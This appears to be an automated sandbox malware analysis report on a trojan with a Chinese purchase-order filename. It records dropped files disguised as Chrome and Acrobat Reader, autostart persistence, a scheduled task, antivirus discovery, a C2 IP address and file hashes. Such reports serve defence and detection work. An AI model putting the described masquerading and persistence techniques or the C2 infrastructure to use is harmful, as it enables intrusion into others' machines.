Pausedblankinfoquestionstopwarning
                        Source: C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeQueries volume information: C:\Users\user\AppData\Local\Temp\NRHRAS.exe VolumeInformationJump to behavior
                        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Stub\Chrome.exeQueries volume information: C:\Users\user\AppData\Roaming\Stub\Chrome.exe VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 10_2_004720DB _memset,_memset,GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,10_2_004720DB
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 10_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,10_2_0041E364
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 10_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,10_2_0040E500

                        Lowering of HIPS / PFW / Operating System Security Settings

                        barindex
                        Yara detected S500Rat
                        Source: Yara matchFile source: 1.2.NRHRAS.exe.2cda580.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.0.NRHRAS.exe.2f0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.NRHRAS.exe.2cda580.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000001.00000002.321313528.0000000002CD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000000.238959755.00000000002F2000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: NRHRAS.exe PID: 5576, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Stub\Chrome.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\NRHRAS.exe, type: DROPPED
                        Source: C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct

                        Mitre Att&ck Matrix

                        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                        2
                        Valid Accounts                        		11
                        Windows Management Instrumentation                        		2
                        Valid Accounts                        		1
                        Exploitation for Privilege Escalation                        		1
                        Disable or Modify Tools                        		21
                        Input Capture                        		2
                        System Time Discovery                        		Remote Services11
                        Archive Collected Data                        		Exfiltration Over Other Network Medium1
                        Ingress Tool Transfer                        		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                        System Shutdown/Reboot
                        Default Accounts12
                        Scripting                        		2
                        Scheduled Task/Job                        		2
                        Valid Accounts                        		11
                        Deobfuscate/Decode Files or Information                        		LSASS Memory2
                        File and Directory Discovery                        		Remote Desktop Protocol21
                        Input Capture                        		Exfiltration Over Bluetooth1
                        Encrypted Channel                        		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                        Domain Accounts3
                        Native API                        		121
                        Registry Run Keys / Startup Folder                        		21
                        Access Token Manipulation                        		12
                        Scripting                        		Security Account Manager16
                        System Information Discovery                        		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                        Non-Standard Port                        		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                        Local Accounts1
                        Command and Scripting Interpreter                        		Logon Script (Mac)12
                        Process Injection                        		121
                        Obfuscated Files or Information                        		NTDS131
                        Security Software Discovery                        		Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                        Cloud Accounts2
                        Scheduled Task/Job                        		Network Logon Script2
                        Scheduled Task/Job                        		11
                        Software Packing                        		LSA Secrets31
                        Virtualization/Sandbox Evasion                        		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                        Replication Through Removable MediaLaunchdRc.common121
                        Registry Run Keys / Startup Folder                        		1
                        Masquerading                        		Cached Domain Credentials3
                        Process Discovery                        		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                        External Remote ServicesScheduled TaskStartup ItemsStartup Items2
                        Valid Accounts                        		DCSync11
                        Application Window Discovery                        		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job31
                        Virtualization/Sandbox Evasion                        		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)21
                        Access Token Manipulation                        		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                        Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)12
                        Process Injection                        		Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 signatures2 2 Behavior Graph ID: 719236 Sample: #U91c7#U8d2d#U8ba2#U5355#U8... Startdate: 10/10/2022 Architecture: WINDOWS Score: 100 70 Snort IDS alert for network traffic 2->70 72 Antivirus detection for dropped file 2->72 74 Antivirus / Scanner detection for submitted sample 2->74 76 3 other signatures 2->76 10 #U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe 2 6 2->10         started        15 Acrobat Reader DC.exe 2->15         started        17 Acrobat Reader DC.exe 2->17         started        19 Acrobat Reader DC.exe 2->19         started        process3 dnsIp4 68 194.5.98.212, 49702, 49705, 49706 DANILENKODE Netherlands 10->68 58 C:\Users\user\...\Acrobat Reader DC.exe, PE32 10->58 dropped 60 C:\Users\user\AppData\Local\Temp60RHRAS.exe, PE32 10->60 dropped 62 C:\Users\user\AppData\Local\Temp\UALDJT.vbs, ASCII 10->62 dropped 94 Creates multiple autostart registry keys 10->94 21 NRHRAS.exe 1 8 10->21         started        26 cmd.exe 1 10->26         started        28 wscript.exe 10->28         started        file5 signatures6 process7 dnsIp8 64 192.168.2.1 unknown unknown 21->64 56 C:\Users\user\AppData\Roaming\...\Chrome.exe, PE32 21->56 dropped 78 Antivirus detection for dropped file 21->78 80 Multi AV Scanner detection for dropped file 21->80 82 Machine Learning detection for dropped file 21->82 86 2 other signatures 21->86 30 cmd.exe 1 21->30         started        32 attrib.exe 1 21->32         started        34 attrib.exe 1 21->34         started        84 Uses schtasks.exe or at.exe to add and modify task schedules 26->84 36 conhost.exe 26->36         started        38 schtasks.exe 1 26->38         started        file9 signatures10 process11 process12 40 Chrome.exe 30->40         started        44 conhost.exe 30->44         started        46 timeout.exe 1 30->46         started        48 conhost.exe 32->48         started        50 conhost.exe 34->50         started        dnsIp13 66 127.0.0.1 unknown unknown 40->66 88 Antivirus detection for dropped file 40->88 90 Multi AV Scanner detection for dropped file 40->90 92 Machine Learning detection for dropped file 40->92 52 powershell.exe 40->52         started        signatures14 process15 process16 54 conhost.exe 52->54         started       

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        #U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe100%AviraHEUR/AGEN.1229397

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Roaming\Stub\Chrome.exe100%AviraHEUR/AGEN.1203089
                        C:\Users\user\AppData\Local\Temp\UALDJT.vbs100%AviraVBS/Runner.VPJI
                        C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe100%AviraHEUR/AGEN.1229397
                        C:\Users\user\AppData\Local\Temp\NRHRAS.exe100%AviraHEUR/AGEN.1203089
                        C:\Users\user\AppData\Roaming\Stub\Chrome.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\NRHRAS.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\NRHRAS.exe85%ReversingLabsByteCode-MSIL.Trojan.Dnoper
                        C:\Users\user\AppData\Local\Temp\NRHRAS.exe79%VirustotalBrowse
                        C:\Users\user\AppData\Local\Temp\NRHRAS.exe43%MetadefenderBrowse
                        C:\Users\user\AppData\Roaming\Stub\Chrome.exe85%ReversingLabsByteCode-MSIL.Trojan.Dnoper
                        C:\Users\user\AppData\Roaming\Stub\Chrome.exe79%VirustotalBrowse
                        C:\Users\user\AppData\Roaming\Stub\Chrome.exe43%MetadefenderBrowse
                        C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe73%ReversingLabsWin32.Backdoor.Bladabhindi

                        Unpacked PE Files

                        SourceDetectionScannerLabelLinkDownload
                        0.3.#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe.414d840.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        0.3.#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe.4110c48.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                        0.3.#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe.40e8450.0.unpack100%AviraTR/Patched.Ren.GenDownload File

                        Domains

                        No Antivirus matches

                        URLs

                        No Antivirus matches

                        Domains and IPs

                        Contacted Domains

                        No contacted domains info

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameNRHRAS.exe, 00000001.00000002.300171430.00000000026B1000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          194.5.98.212
                          		unknownNetherlands
                          		208476DANILENKODEtrue

                          Private

                          IP
                          192.168.2.1
                          127.0.0.1

                          General Information

                          Joe Sandbox Version:36.0.0 Rainbow Opal
                          Analysis ID:719236
                          Start date and time:2022-10-10 07:42:33 +02:00
                          Joe Sandbox Product:CloudBasic
                          Overall analysis duration:0h 11m 25s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Sample file name:#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                          Run name:Run with higher sleep bypass
                          Number of analysed new started processes analysed:32
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • HDC enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal100.troj.evad.winEXE@30/12@0/3
                          EGA Information:
                          • Successful, ratio: 100%
                          HDC Information:
                          • Successful, ratio: 52% (good quality ratio 49.8%)
                          • Quality average: 83.5%
                          • Quality standard deviation: 25.2%
                          HCA Information:
                          • Successful, ratio: 90%
                          • Number of executed functions: 76
                          • Number of non-executed functions: 325
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                          Warnings

                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                          • Excluded domains from analysis (whitelisted): fs.microsoft.com
                          • Not all processes where analyzed, report is missing behavior information
                          • Report creation exceeded maximum time and may have missing disassembly code information.
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                          • Report size getting too big, too many NtSetInformationFile calls found.

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          07:43:31AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run UALDJT "C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe"
                          07:43:40AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run UALDJT "C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe"
                          07:43:50AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UALDJT.lnk

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          194.5.98.212975nbIb5Ho.exeGet hashmaliciousBrowse
                          • 194.5.98.212:4001/moz-sdk

                          Domains

                          No context

                          ASNs

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          DANILENKODE#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exeGet hashmaliciousBrowse
                          • 194.5.98.212
                          IMG_9085976792.scr.exeGet hashmaliciousBrowse
                          • 194.5.98.219
                          prices list#00393.jsGet hashmaliciousBrowse
                          • 194.5.98.20
                          SHIPMENT NOTIFICATION- EXPORTERS& IMPORTERS SCHEDULED DATE AVAILABLE..exeGet hashmaliciousBrowse
                          • 194.5.98.20
                          SecuriteInfo.com.Variant.Jaik.98838.12794.21309.exeGet hashmaliciousBrowse
                          • 194.5.98.63
                          USD$19,959.92_ACH_Automation_M A Medical Dermatology & Esthetics.xlsGet hashmaliciousBrowse
                          • 194.5.97.174
                          px6K9mVOB7.jsGet hashmaliciousBrowse
                          • 194.5.98.235
                          7WSibRX0sg.jsGet hashmaliciousBrowse
                          • 194.5.98.235
                          RTM007259 doc.com.exeGet hashmaliciousBrowse
                          • 194.5.98.39
                          RTM0074163 doc.com.exeGet hashmaliciousBrowse
                          • 194.5.98.39
                          SecuriteInfo.com.Win32.DropperX-gen.15579.exeGet hashmaliciousBrowse
                          • 194.5.98.244
                          SecuriteInfo.com.Win32.DropperX-gen.6565.exeGet hashmaliciousBrowse
                          • 194.5.98.178
                          Xhyyuptltsmccb.exeGet hashmaliciousBrowse
                          • 194.5.98.164
                          Solicitud de cotizaci#U00f3n factura 28-09-2022.exeGet hashmaliciousBrowse
                          • 194.5.98.244
                          irish.exeGet hashmaliciousBrowse
                          • 194.5.98.194
                          TransactionSummary_28-09-2022.xll.dllGet hashmaliciousBrowse
                          • 194.5.98.194
                          SecuriteInfo.com.IL.Trojan.MSILZilla.23263.10083.2205.exeGet hashmaliciousBrowse
                          • 194.5.98.244
                          SecuriteInfo.com.Win32.PWSX-gen.8435.exeGet hashmaliciousBrowse
                          • 194.5.98.244
                          SecuriteInfo.com.W32.MSIL_Kryptik.IAJ.gen.Eldorado.28340.exeGet hashmaliciousBrowse
                          • 194.5.98.244
                          SecuriteInfo.com.Win32.RATX-gen.19218.exeGet hashmaliciousBrowse
                          • 194.5.98.244

                          JA3 Fingerprints

                          No context

                          Dropped Files

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          C:\Users\user\AppData\Roaming\Stub\Chrome.exe#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exeGet hashmaliciousBrowse
                            C:\Users\user\AppData\Local\Temp\NRHRAS.exe#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exeGet hashmaliciousBrowse
                              C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exeGet hashmaliciousBrowse

                                Created / dropped Files

                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\NRHRAS.exe.log

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\NRHRAS.exe
                                File Type:CSV text
                                Category:dropped
                                Size (bytes):654
                                Entropy (8bit):5.374391981354885
                                Encrypted:false
                                SSDEEP:12:Q3La/KDLI4MWuPTxAIOKbbDLI4MWuPOKN08JOKhap+92n4MNQpN9tv:ML9E4KrgKDE4KGKN08AKh6+84xpNT
                                MD5:C8A62E39DE7A3F805D39384E8BABB1E0
                                SHA1:B32B1257401F17A2D1D5D3CC1D8C1E072E3FEE31
                                SHA-256:A7BC127854C5327ABD50C86000BF10586B556A5E085BB23523B07A15DD4C5383
                                SHA-512:7DB2825131F5CDA6AF33A179D9F7CD0A206FF34AE50D6E66DE9E99BE2CD1CB985B88C00F0EDE72BBC4467E7E42B5DC6132403AA2EC1A0A7A6D11766C438B10C3
                                Malicious:false
                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\f2e0589ed6d670f264a5f65dd0ad000f\Microsoft.VisualBasic.ni.dll",0..

                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):64
                                Entropy (8bit):0.9260988789684415
                                Encrypted:false
                                SSDEEP:3:Nlllulb/lj:NllUb/l
                                MD5:13AF6BE1CB30E2FB779EA728EE0A6D67
                                SHA1:F33581AC2C60B1F02C978D14DC220DCE57CC9562
                                SHA-256:168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
                                SHA-512:1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
                                Malicious:false
                                Preview:@...e................................................@..........

                                C:\Users\user\AppData\Local\Temp\NRHRAS.exe

                                Download File
                                Process:C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):51200
                                Entropy (8bit):5.624273190284013
                                Encrypted:false
                                SSDEEP:768:LcUAfpLYlYz/kv+Zrs47rbbaM8pevmJANvoizcc6Jg2vYjDGcfAgpv65D0Q:oUAfr/kmFfbaMruAEDnvY1fAAv6WQ
                                MD5:9B1C1C565D60ED67CB6E1986ACD95C3A
                                SHA1:29FCFCF6643FB10468D28B2DFE3743728C3D3F1C
                                SHA-256:AC7C5B85153457541EA7E9EAE7767DB27C7604B3A61E15046E5C5736C1F7479C
                                SHA-512:B2D69E82539C877CB79441E132B9AD8E1424C5C2501017439834EA4BD5E7EF871ECFE43BF69B69E91C5B93B5C0773E25A016C2FE709ABB083B14248D49F42CDF
                                Malicious:true
                                Yara Hits:
                                • Rule: JoeSecurity_S500Rat, Description: Yara detected S500Rat, Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exe, Author: Joe Security
                                Antivirus:
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 85%
                                • Antivirus: Virustotal, Detection: 79%, Browse
                                • Antivirus: Metadefender, Detection: 43%, Browse
                                Joe Sandbox View:
                                • Filename: #U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe, Detection: malicious, Browse
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....@.b................................. ........@.. ....................... ............@.................................P...K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........R......................................................................../.\.....(....*b~....,.~....o..........*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.......*6.(1.........*2~.....o2...*6(r....Po....*6(r....Po....*J(....o......o....*..._*. ....(......... ....(...............*...o.....Z(....}......{.....X(....}......(....}....*^.{....(.....~....}....*2.{....(....*...{.....{ ......|!...{.....|!...{....(5...}....

                                C:\Users\user\AppData\Local\Temp\UALDJT.vbs

                                Download File
                                Process:C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:modified
                                Size (bytes):939
                                Entropy (8bit):5.555511759188888
                                Encrypted:false
                                SSDEEP:24:dF/UmXTRkT4U/qaG2b6xI6C6x1xLxeQvJWAB/FVEMPENEZaVx5xCA:f/U+T6Txt+G+7xLxe0WABNVIqZaVzgA
                                MD5:41EA145577CF485D8DDA2F334D71B854
                                SHA1:E5C1A867435E510ACB7C317300C23F6A59423016
                                SHA-256:42A274DEC7ECD2F0D2CEC8CBFF8CF24D2C995A24278F5042BE3A9BA900EFF36C
                                SHA-512:B7C8DF912A84F7AE93EA68F93E95F7ECE177A2E538F0E1E376F2C7E5BD00F4AD0CA5615E189FEAC4C4D37D7579C0F9A99B096EA405F2FB58149439E292172282
                                Malicious:true
                                Yara Hits:
                                • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: C:\Users\user\AppData\Local\Temp\UALDJT.vbs, Author: Joe Security
                                Antivirus:
                                • Antivirus: Avira, Detection: 100%
